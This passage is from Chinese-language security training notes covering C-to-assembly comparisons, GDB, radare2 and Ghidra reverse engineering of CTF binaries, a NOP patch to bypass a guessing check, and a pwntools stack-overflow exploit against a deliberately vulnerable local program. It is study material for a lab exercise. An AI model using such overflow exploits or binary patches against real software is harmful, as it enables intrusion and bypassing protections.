    printf("%d \u7684\u968e\u4e58\u70ba%d\n", i, f(i));
9
 7b8:  ldr  w0, [sp, #28]
10
 7bc:  bl  754 <f>
11
 7c0:  mov  w2, w0
12
 7c4:  ldr  w1, [sp, #28]
13
 7c8:  adrp  x0, 0 <__abi_tag-0x278>
14
 7cc:  add  x0, x0, #0x800
15
 7d0:  bl  630 <printf@plt>
16
    return 0;
17
 7d4:  mov  w0, #0x0                     // #0
18
}
19
 7d8:  ldp  x29, x30, [sp], #32
20
 7dc:  ret

範例五（swap交換）

1
#include <stdio.h>
2
void swap (int a, int b);
3
int main (void) {
4
  int i = 1234, j = 4321;
5
  printf ("i = %d, j = %d\n" , i, j);
6
  swap (i, j);
7
  printf ("i = %d, j = %d\n" , i, j);
8
  return 0;
9
}
10
void swap (int a, int b) {
11
  printf ("互換前:a = %d, b = %d\n" , a, b);
12
  int temp = a;
13
  a = b;
14
  b = temp;
15
  printf ("互換後:a = %d, b = %d\n" , a, b);
16
}

編譯與執行結果
assembly

1
00000000000007ac <swap>:
2
void swap (int a, int b) {
3
 7ac:  stp  x29, x30, [sp, #-48]!
4
 7b0:  mov  x29, sp
5
 7b4:  str  w0, [sp, #28]
6
 7b8:  str  w1, [sp, #24]
7
  printf ("\u4e92\u63db\u524d:a = %d, b = %d\n" , a, b);
8
 7bc:  ldr  w2, [sp, #24]
9
 7c0:  ldr  w1, [sp, #28]
10
 7c4:  adrp  x0, 0 <__abi_tag-0x278>
11
 7c8:  add  x0, x0, #0x838
12
 7cc:  bl  630 <printf@plt>
13
  int temp = a;
14
 7d0:  ldr  w0, [sp, #28]
15
 7d4:  str  w0, [sp, #44]
16
  a = b;
17
 7d8:  ldr  w0, [sp, #24]
18
 7dc:  str  w0, [sp, #28]
19
  b = temp;
20
 7e0:  ldr  w0, [sp, #44]
21
 7e4:  str  w0, [sp, #24]
22
  printf ("\u4e92\u63db\u5f8c:a = %d, b = %d\n" , a, b);
23
 7e8:  ldr  w2, [sp, #24]
24
 7ec:  ldr  w1, [sp, #28]
25
 7f0:  adrp  x0, 0 <__abi_tag-0x278>
26
 7f4:  add  x0, x0, #0x858
27
 7f8:  bl  630 <printf@plt>
28
}
29
 7fc:  nop
30
 800:  ldp  x29, x30, [sp], #48
31
 804:  ret

範例六(push與pop ==>堆疊)

1
#include <stdio.h>
2
int sum(int n1, int n2, int n3, int n4, int n5, int n6, int n7, int n8, int n9){
3
    return n1 + n2 + n3 + n4 + n5 + n6 + n7 + n8 + n9;
4
}
5
int main(){
6
    int result, num1 = 1, num2 = 2, num3 = 3, num4 = 4, num5 = 5, num6 = 6, num7 = 7, num8 = 8, num9 = 9;
7
    result = sum(num1, num2, num3, num4, num5, num6, num7, num8, num9);
8
    printf("sum is %d\n", result);
9
    return 0;
10
}

編譯與執行結果
assembly!

1
00000000000007c4 <main>:
2
int main(){
3
 7c4:  sub  sp, sp, #0x50
4
 7c8:  stp  x29, x30, [sp, #16]
5
 7cc:  add  x29, sp, #0x10
6
    int result, num1 = 1, num2 = 2, num3 = 3, num4 = 4, num5 = 5, num6 = 6, num7 = 7, num8 = 8, num9 = 9;
7
 7d0:  mov  w0, #0x1                     // #1
8
 7d4:  str  w0, [sp, #40]
9
 7d8:  mov  w0, #0x2                     // #2
10
 7dc:  str  w0, [sp, #44]
11
 7e0:  mov  w0, #0x3                     // #3
12
 7e4:  str  w0, [sp, #48]
13
 7e8:  mov  w0, #0x4                     // #4
14
 7ec:  str  w0, [sp, #52]
15
 7f0:  mov  w0, #0x5                     // #5
16
 7f4:  str  w0, [sp, #56]
17
 7f8:  mov  w0, #0x6                     // #6
18
 7fc:  str  w0, [sp, #60]
19
 800:  mov  w0, #0x7                     // #7
20
 804:  str  w0, [sp, #64]
21
 808:  mov  w0, #0x8                     // #8
22
 80c:  str  w0, [sp, #68]
23
 810:  mov  w0, #0x9                     // #9
24
 814:  str  w0, [sp, #72]
25
    result = sum(num1, num2, num3, num4, num5, num6, num7, num8, num9);
26
 818:  ldr  w0, [sp, #72]
27
 81c:  str  w0, [sp]
28
 820:  ldr  w7, [sp, #68]
29
 824:  ldr  w6, [sp, #64]
30
 828:  ldr  w5, [sp, #60]
31
 82c:  ldr  w4, [sp, #56]
32
 830:  ldr  w3, [sp, #52]
33
 834:  ldr  w2, [sp, #48]
34
 838:  ldr  w1, [sp, #44]
35
 83c:  ldr  w0, [sp, #40]
36
 840:  bl  754 <sum>
37
 844:  str  w0, [sp, #76]
38
    printf("sum is %d\n", result);
39
 848:  ldr  w1, [sp, #76]
40
 84c:  adrp  x0, 0 <__abi_tag-0x278>
41
 850:  add  x0, x0, #0x888
42
 854:  bl  630 <printf@plt>
43
    return 0;
44
 858:  mov  w0, #0x0                     // #0
45
}
46
 85c:  ldp  x29, x30, [sp, #16]
47
 860:  add  sp, sp, #0x50
48
 864:  ret

範例七:遞迴函數

1
#include <stdio.h>
2
 double f(unsigned int i){
3
   if(i <= 1)
4
      return 1;
5
   else   return i * f(i - 1);
6
}
7
int main(){
8
    int i = 14;
9
    printf("%d 的階乘為%f\n", i, f(i));
10
    return 0;
11
}

1
- 編譯與執行結果![image](https://hackmd.io/_uploads/Syygfk_9a.png)

assembly

1
000000000000079c <main>:
2
int main(){
3
 79c:  stp  x29, x30, [sp, #-32]!
4
 7a0:  mov  x29, sp
5
    int i = 14;
6
 7a4:  mov  w0, #0xe                     // #14
7
 7a8:  str  w0, [sp, #28]
8
    printf("%d \u7684\u968e\u4e58\u70ba%f\n", i, f(i));
9
 7ac:  ldr  w0, [sp, #28]
10
 7b0:  bl  754 <f>
11
 7b4:  ldr  w1, [sp, #28]
12
 7b8:  adrp  x0, 0 <__abi_tag-0x278>
13
 7bc:  add  x0, x0, #0x7f0
14
 7c0:  bl  630 <printf@plt>
15
    return 0;
16
 7c4:  mov  w0, #0x0                     // #0
17
}
18
 7c8:  ldp  x29, x30, [sp], #32
19
 7cc:  ret

GDB

安裝peda

1
git clone https://github.com/longld/peda.git ~/peda
2
echo "source ~/peda/peda.py" >> ~/.gdbinit

指令說明來源==>連結↗

help ( h )：顯示指令簡短說明。例：help breakpoint
file：開啟檔案。等同於 gdb filename
run ( r )：執行程式，或是從頭再執行程式。
kill：中止程式的執行。
backtrace ( bt )：顯示程式呼叫的堆疊(stack)。。會顯示出上層所有的 frame 的簡略資訊。
print ( p )：印出變數內容。例：print i，印出變數 i 的內容。
list ( l )：印出程式碼。若在編譯時沒有加上 -g 參數，list 指令將無作用。
whatis：印出變數的型態。例： whatis i，印出變數 i 的型態。
breakpoint (b, bre, break)：設定中斷點使用 info breakpoint (info b) 來查看已設定了哪些中斷點。在程式被中斷後，使用 info line 來查看正停在哪一行。
continue (c, cont)：繼續執行。和 breakpoint 搭配使用。
frame：顯示正在執行的行數、副程式名稱、及其所傳送的參數等等 frame 資訊。 frame 2：看到 #2，也就是上上一層的 frame 的資訊。
next ( n )：單步執行，但遇到函式時會將呼叫的函式作為一個語句執行。
step ( s )：單步執行。但遇到函式時會進入呼叫的函式執行。
up：直接回到上一層的 frame，並顯示其 stack 資訊，如進入點及傳入的參數等。
up 2：直接回到上三層的 frame，並顯示其 stack 資訊。
down：直接跳到下一層的 frame，並顯示其 stack 資訊。必須使用 up 回到上層的 frame 後，才能用 down 回到該層來。
info：顯示一些特定的資訊。如： info break，顯示中斷點， info share，顯示共享函式庫資訊。
disable：暫時關閉某個 breakpoint 或 display 之功能。
enable：將被 disable 暫時關閉的功能再啟用。
clear/delete：刪除某個 breakpoint。
attach PID：載入已執行中的程式以進行除錯。其中的 PID 可由 ps 指令取得。
detach PID：釋放已 attach 的程式。
shell：執行 Shell 指令。如：shell ls，呼叫 sh 以執行 ls 指令。
quit：離開 gdb。或是按下 Ctrl+C 也行。
按下Enter：直接執行上個指令

示例

1
#include <stdio.h>
2
void swap (int a, int b);
3
int main (void) {
4
  int i = 1234, j = 4321;
5
  printf ("i = %d, j = %d\n" , i, j);
6
  swap (i, j);
7
  printf ("i = %d, j = %d\n" , i, j);
8
  return 0;
9
}
10
void swap (int a, int b) {
11
  printf ("互換前:a = %d, b = %d\n" , a, b);
12
  int temp = a;
13
  a = b;
14
  b = temp;
15
  printf ("互換後:a = %d, b = %d\n" , a, b);
16
}

輸入指令gdb ./gdb_example
當我們將第7行終止，則交換不會產生
- 輸入b 7後運行，r為運行(run)

radare2技術實戰

r2用法

1. 在 Radare2 中打開檔案

r2 adder

2. 分析檔案

aaa #分析所有

3. 列出函數

afl # 列出所有函數

4. 反組譯和分析函數

pdf @ main # 反組譯 main 函數

5. 使用視覺模式進行更好的分析

s main # 移動到 main 函數 V # 進入視覺模式

在視覺模式中，使用箭頭鍵或 HJKL 進行導航。
按 ? 查看鍵綁定的幫助。

6. 退出 Radare2

q # 退出 Radare2

7. 執行外部指令（例如 Python）

!python3 # 開啟 Python3 shell

您可以使用! 來執行外部指令(例如 !ls)
注意：
- 使用 pd 和 pd $n_line 來打印反彙編的指令。
- 使用 s $function_name 或 s $address 來移動到特定的地址或函數。
- Radare2 有三種模式：CLI、Hex Mode 和 Visual Mode。

範例練習1 ==> RE/adder

當我們正常執行時，該執行檔讓我猜3個數字，可是我沒猜到
輸入r2 add,再輸入aaa進行深入分析,為了找到main
輸入pdf @ main逆向回去
要進入visual模式，先找到main函式，使用s mian(s for seek),再輸入VV進入visual模式
分析ture or false 找尋關鍵部分，如圖，該提顯示為1337
確實有成功

範例練習2 ==> RE/LuckyGuess

安裝

由於要先裝java的sdk，輸入:sudo apt-get install -y openjdk-17-jdk
確認java版本
輸入wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_11.0.1_build/ghidra_11.0.1_PUBLIC_20240130.zip將檔案下載下來
解壓縮檔案unzip ghidra_11.0.1_PUBLIC_20240130.zip
開始執行./ghidraRun

逆向

將LuckyGuess丟進去然後開始分析
找到text執行檔
- 呈現這樣
然後要到function裡找到main函數
- 挖出來後長這樣

1
undefined8 main(void)
2
{
3
  time_t tVar1;
4
  char *pcVar2;
5
  basic_ostream *pbVar3;
6
  long lVar4;
7
  undefined8 *puVar5;
8
  undefined8 *puVar6;
9
  byte bVar7;
10
  int local_a8;
11
  int local_a4;
12
  uint local_a0;
13
  int local_9c;
14
  undefined8 local_98 [18];
15

16
  bVar7 = 0;
17
  primp();
18
  puVar5 = &DAT_00400d80;
19
  puVar6 = local_98;
20
  for (lVar4 = 0x11; lVar4 != 0; lVar4 = lVar4 + -1) {
21
    *puVar6 = *puVar5;
22
    puVar5 = puVar5 + (ulong)bVar7 * -2 + 1;
23
    puVar6 = puVar6 + (ulong)bVar7 * -2 + 1;
24
  }
25
  tVar1 = time((time_t *)0x0);
26
  srand((uint)tVar1);
27
  local_9c = rand();
28
  local_9c = local_9c % 0x4000000;
29
  local_a4 = 0;
30
  local_a8 = 0;
31
  while( true ) {
32
    if (0x16 < local_a4) {
33
      local_a4 = local_a4 + 1;
34
      pbVar3 = std::operator<<((basic_ostream *)std::cout,"no dice.");
35
      std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar3,std::endl<>);
36
      return 0;
37
    }
38
    local_a4 = local_a4 + 1;
39
    std::operator<<((basic_ostream *)std::cout,"Guess? ");
40
    std::basic_istream<>::operator>>((basic_istream<> *)std::cin,&local_a8);
41
    if (local_a8 == local_9c) break;  //==這邊可以直接跳出迴圈==
42
    if (local_a8 < local_9c) {
43
      pcVar2 = "lo";
44
    }
45
    else {
46
      pcVar2 = "hi";
47
    }
48
    pbVar3 = std::operator<<((basic_ostream *)std::cout,pcVar2);
49
    std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar3,std::endl<>);
50
  }
51
  for (local_a0 = 0; local_a0 < 0x22; local_a0 = local_a0 + 1) {
52
    std::operator<<((basic_ostream *)std::cout,
53
                    (byte)*(undefined4 *)(c610 + (long)(int)local_a0 * 4) ^
54
                    (byte)*(undefined4 *)((long)local_98 + (long)(int)local_a0 * 4));
55
  }
56
  return 1;
57
}

知道邏輯要跳脫while，用gdb
先反組譯

1
0x0000000000400af8 <+0>:  push   rbp
2
0x0000000000400af9 <+1>:  mov    rbp,rsp
3
0x0000000000400afc <+4>:  sub    rsp,0xa0
4
0x0000000000400b03 <+11>:  call   0x400a7e <_Z5primpv>
5
0x0000000000400b08 <+16>:  lea    rdx,[rbp-0x90]
6
0x0000000000400b0f <+23>:  mov    esi,0x400d80
7
0x0000000000400b14 <+28>:  mov    eax,0x11
8
0x0000000000400b19 <+33>:  mov    rdi,rdx
9
0x0000000000400b1c <+36>:  mov    rcx,rax
10
0x0000000000400b1f <+39>:  rep movs QWORD PTR es:[rdi],QWORD PTR ds:[rsi]
11
0x0000000000400b22 <+42>:  mov    edi,0x0
12
0x0000000000400b27 <+47>:  call   0x400930 <time@plt>
13
0x0000000000400b2c <+52>:  mov    edi,eax
14
0x0000000000400b2e <+54>:  call   0x4008f0 <srand@plt>
15
0x0000000000400b33 <+59>:  call   0x400920 <rand@plt>
16
0x0000000000400b38 <+64>:  cdq
17
0x0000000000400b39 <+65>:  shr    edx,0x6
18
0x0000000000400b3c <+68>:  add    eax,edx
19
0x0000000000400b3e <+70>:  and    eax,0x3ffffff
20
0x0000000000400b43 <+75>:  sub    eax,edx
21
0x0000000000400b45 <+77>:  mov    DWORD PTR [rbp-0x94],eax
22
0x0000000000400b4b <+83>:  mov    DWORD PTR [rbp-0x9c],0x0
23
0x0000000000400b55 <+93>:  mov    DWORD PTR [rbp-0xa0],0x0
24
0x0000000000400b5f <+103>:  jmp    0x400c27 <main+303>
25
0x0000000000400b64 <+108>:  mov    esi,0x400d60
26
0x0000000000400b69 <+113>:  mov    edi,0x6021c0
27
0x0000000000400b6e <+118>:  call   0x4008d0 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@plt>
28
0x0000000000400b73 <+123>:  lea    rax,[rbp-0xa0]
29
0x0000000000400b7a <+130>:  mov    rsi,rax
30
0x0000000000400b7d <+133>:  mov    edi,0x6020a0
31
0x0000000000400b82 <+138>:  call   0x4008e0 <_ZNSirsERi@plt>
32
0x0000000000400b87 <+143>:  mov    eax,DWORD PTR [rbp-0xa0]
33
0x0000000000400b8d <+149>:  cmp    eax,DWORD PTR [rbp-0x94]
34
0x0000000000400b93 <+155>:  jne    0x400bf3 <main+251> //提供了變數地址
35
0x0000000000400b95 <+157>:  mov    DWORD PTR [rbp-0x98],0x0
36
0x0000000000400b9f <+167>:  jmp    0x400bd9 <main+225>
37
0x0000000000400ba1 <+169>:  mov    eax,DWORD PTR [rbp-0x98]
38
0x0000000000400ba7 <+175>:  cdqe
39
0x0000000000400ba9 <+177>:  mov    eax,DWORD PTR [rbp+rax*4-0x90]
40
0x0000000000400bb0 <+184>:  mov    edx,eax
41
0x0000000000400bb2 <+186>:  mov    eax,DWORD PTR [rbp-0x98]
42
0x0000000000400bb8 <+192>:  cdqe
43
0x0000000000400bba <+194>:  mov    eax,DWORD PTR [rax*4+0x602300]
44
0x0000000000400bc1 <+201>:  xor    eax,edx
45
0x0000000000400bc3 <+203>:  movsx  eax,al
46
0x0000000000400bc6 <+206>:  mov    esi,eax
47
0x0000000000400bc8 <+208>:  mov    edi,0x6021c0
48
0x0000000000400bcd <+213>:  call   0x4008b0 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_c@plt>
49
0x0000000000400bd2 <+218>:  add    DWORD PTR [rbp-0x98],0x1
50
0x0000000000400bd9 <+225>:  mov    eax,DWORD PTR [rbp-0x98]
51
0x0000000000400bdf <+231>:  movsxd rdx,eax
52
0x0000000000400be2 <+234>:  mov    eax,0x22
53
0x0000000000400be7 <+239>:  cmp    rdx,rax
54
0x0000000000400bea <+242>:  jb     0x400ba1 <main+169>
55
0x0000000000400bec <+244>:  mov    eax,0x1
56
0x0000000000400bf1 <+249>:  jmp    0x400c65 <main+365>
57
0x0000000000400bf3 <+251>:  mov    eax,DWORD PTR [rbp-0xa0]
58
0x0000000000400bf9 <+257>:  cmp    eax,DWORD PTR [rbp-0x94]
59
0x0000000000400bff <+263>:  jge    0x400c08 <main+272>
60
0x0000000000400c01 <+265>:  mov    eax,0x400d68
61
0x0000000000400c06 <+270>:  jmp    0x400c0d <main+277>
62
0x0000000000400c08 <+272>:  mov    eax,0x400d6b
63
0x0000000000400c0d <+277>:  mov    rsi,rax
64
0x0000000000400c10 <+280>:  mov    edi,0x6021c0
65
0x0000000000400c15 <+285>:  call   0x4008d0 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@plt>
66
0x0000000000400c1a <+290>:  mov    esi,0x400910
67
0x0000000000400c1f <+295>:  mov    rdi,rax
68
0x0000000000400c22 <+298>:  call   0x400900 <_ZNSolsEPFRSoS_E@plt>
69
0x0000000000400c27 <+303>:  mov    eax,DWORD PTR [rbp-0x9c]
70
0x0000000000400c2d <+309>:  lea    edx,[rax+0x1]
71
0x0000000000400c30 <+312>:  mov    DWORD PTR [rbp-0x9c],edx
72
0x0000000000400c36 <+318>:  cmp    eax,0x16
73
0x0000000000400c39 <+321>:  setle  al
74
0x0000000000400c3c <+324>:  test   al,al
75
0x0000000000400c3e <+326>:  jne    0x400b64 <main+108>
76
0x0000000000400c44 <+332>:  mov    esi,0x400d6e
77
0x0000000000400c49 <+337>:  mov    edi,0x6021c0
78
0x0000000000400c4e <+342>:  call   0x4008d0 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@plt>
79
0x0000000000400c53 <+347>:  mov    esi,0x400910
80
0x0000000000400c58 <+352>:  mov    rdi,rax
81
0x0000000000400c5b <+355>:  call   0x400900 <_ZNSolsEPFRSoS_E@plt>
82
0x0000000000400c60 <+360>:  mov    eax,0x0
83
0x0000000000400c65 <+365>:  leave
84
0x0000000000400c66 <+366>:  ret

將 {=> 0x75} 為nop指令 {=> 0x90}

PWN

擷取提示

pwntools 常用技術 ==>出處↗

載入pwntools套件 ==> from pwn import * # 可將所有子模組和一些常用的系統函數庫導入
建立與程式連結(connection)
- 與遠端程式(使用remote())
  - conn = remote(‘ip_address’, port_num)
  - conn = remote(‘173.4.5.1’, 8888)
- 與本地端程式(使用process())==> conn = process(’./pwn1’)
接收資料 receive
- recv(numb=1096, timeoutxtdefault)：接收指定位元組數的資料
- recvall()：接收資料直到 EOF
- recvline(keepends=True)：接收一行，可選擇是否保留行尾的 \n
- recvlines(N):接收 N行輸出
- recvrepeat(timeoutxtdefault)：接收資料直到 EOF(END of FILE) 或 timeout
- recvuntil(delims, timeoutxtdefault)：接收資料直到 delims 出現
傳資料
- send(data)：發送資料
- sendline(data)：發送一行，預設會在行尾加 \n
- sendlineafter(delims, 要送出的資料)：從 delims 出現後,將要送出的資料傳送給程式
互動 ==> conn.interactive()
- 可同時對遠端系統讀寫資料
- 相當於回到 shell 模式進行互動
- 在取得 shell 之後調用
pwntools工具的使用↗

範例 /DATA202401/pwn

1
#include"stdio.h"
2
#include"stdlib.h"
3
int main(){
4
  setvbuf(stdout, 0, 2, 0);
5
  setvbuf(stdin, 0, 2, 0);
6
  int token = 1234;
7
  char key[16];
8
  printf("Billy left his key in the locked room.\n");
9
  printf("However, he forgot the token of the room.\n");
10
  printf("Do you know what's the key?");
11
  read(0, key, 40);
12
  if((int)token == 0xdeadbeef){
13
    printf("Door open. OwO\n");
14
    system("cat ./flag");
15
  }else{
16
    printf("Cannot open door. QwQ\n");
17
  }
18
  return 0;
19
}

輸入指令
- gedit pass.c
- gcc -fno-stack-protector -z execstack pass.c -o pass -no-pie
- socat TCP-LISTEN:21004,fork EXEC:'./pass'

1
from pwn import *
2
r = process('./pass')
3
r = remote('localhost',21004)
4
payload = b'B'*28
5
r.sendline(payload+ p64(0xdeadbeef))
6
r.interactive()

py
flag
用gdb看一下 ==disabled!==
用radare2去看main
- 知道下面的是哪邊是false就可以去用地址了
  - 其中的變數
  - 相互compare

Thanks for reading!

1/28、1/31 SecurityFocus Online

Sun Jan 28 2024

13388 words · 104 minutes

Daily writeup

1/28、1/31 SecurityFocus Online

Linux C

編譯與執行

範例1:輸入與輸出

執行與編譯結果

範例3:格式化輸入與輸出 | 算術運算子（Arithmetic Operators）

執行與編譯結果

範例11:迴圈設計

範例16:費式序列Fibonacci Serie

從原始碼到可執行檔

gcc的參數

組合語言格式:INTEL vs AT&T 格式

比較之結果

LD_PRELOAD

實作範例與結果

範例程式

駭入程式範例

編譯並執行看看被竄改的答案

比較

Linux 執行檔分析

Linux file命令(command)

strings

hexdump | hd

size

DATA202401↗

DAY1

hexedit

networkingOK.pcap

readelf

Linux 執行檔分析_objdump

1.ELF 分析

2.objdump逆向分析

範例1

範例2

Linux 執行檔分析常用工具

ldd 指令

nm 指令

計算機結構與組合程式

線上反組譯服務 ==> 連結↗

NASM(Netwide Assembler)組合程式設計

NASM(Netwide Assembler)

nasm程式範例

32位元NASM與64位元NASM比較

相互比較與說明

教材導讀

Chapter 01

C vs Assembly

範例一（計算與先後）

範例二（if-else）

範例三（LOOP）

範例四 ( 函數 )

範例五（swap交換）

範例六(push與pop ==>堆疊)

範例七:遞迴函數

GDB

安裝peda

指令說明 來源==>連結↗

示例

radare2技術實戰

r2用法

1. 在 Radare2 中打開檔案

2. 分析檔案

3. 列出函數

4. 反組譯和分析函數

5. 使用視覺模式進行更好的分析

6. 退出 Radare2

7. 執行外部指令（例如 Python）

範例練習1 ==> RE/adder

範例練習2 ==> RE/LuckyGuess

安裝

逆向

PWN

pwntools 常用技術 ==>出處↗

範例 /DATA202401/pwn

1/28、1/31 SecurityFocus Online

指令說明來源==>連結↗